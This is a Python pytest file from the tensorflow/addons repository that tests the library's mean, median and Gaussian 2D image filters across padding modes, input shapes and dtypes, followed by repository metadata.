height, width = image_shape[-3], image_shape[-2]
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
[3.3333333, 5.0, 4.0],
[3.2222223, 4.6666665, 3.6666667],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_median(shape):
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[4, 4, 5], [5, 5, 5], [5, 6, 6]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_median(image_shape):
expected_plane = tf.constant([[5, 5, 5], [5, 5, 5], [5, 5, 5]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter(image_shape):
expected_plane = tf.constant([[0, 2, 0], [2, 5, 3], [0, 5, 0]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant([[1, 2, 1], [2, 5, 3], [1, 5, 1]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[2, 3, 3], [4, 5, 6], [7, 7, 8]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("shape", [[10, 10], [10, 10, 3], [2, 10, 10, 3]])
@pytest.mark.parametrize("padding", ["SYMMETRIC", "CONSTANT", "REFLECT"])
@pytest.mark.parametrize("dtype", [np.float32, np.float64])
def test_gaussian_filter2d(shape, padding, dtype):
modes = {
"SYMMETRIC": "reflect",
"CONSTANT": "constant",
"REFLECT": "mirror",
}
image = np.arange(np.prod(shape)).reshape(*shape).astype(dtype)
ndims = len(shape)
sigma = [1.0, 1.0]
if ndims == 3:
sigma = [1.0, 1.0, 0.0]
elif ndims == 4:
sigma = [0.0, 1.0, 1.0, 0.0]
test_utils.assert_allclose_according_to_type(
gaussian_filter2d(image, 9, 1, padding=padding).numpy(),
gaussian_filter(image, sigma, mode=modes[padding]),
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
def test_gaussian_filter2d_different_sigma():
image = np.arange(40 * 40).reshape(40, 40).astype(np.float32)
sigma = [1.0, 2.0]
test_utils.assert_allclose_according_to_type(
gaussian_filter2d(image, [9, 17], sigma).numpy(),
gaussian_filter(image, sigma, mode="mirror"),
)
|
tensorflow/addons
|
tensorflow_addons/image/tests/filters_test.py
|
Python
|
apache-2.0
| 11,712
| 0.000256
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.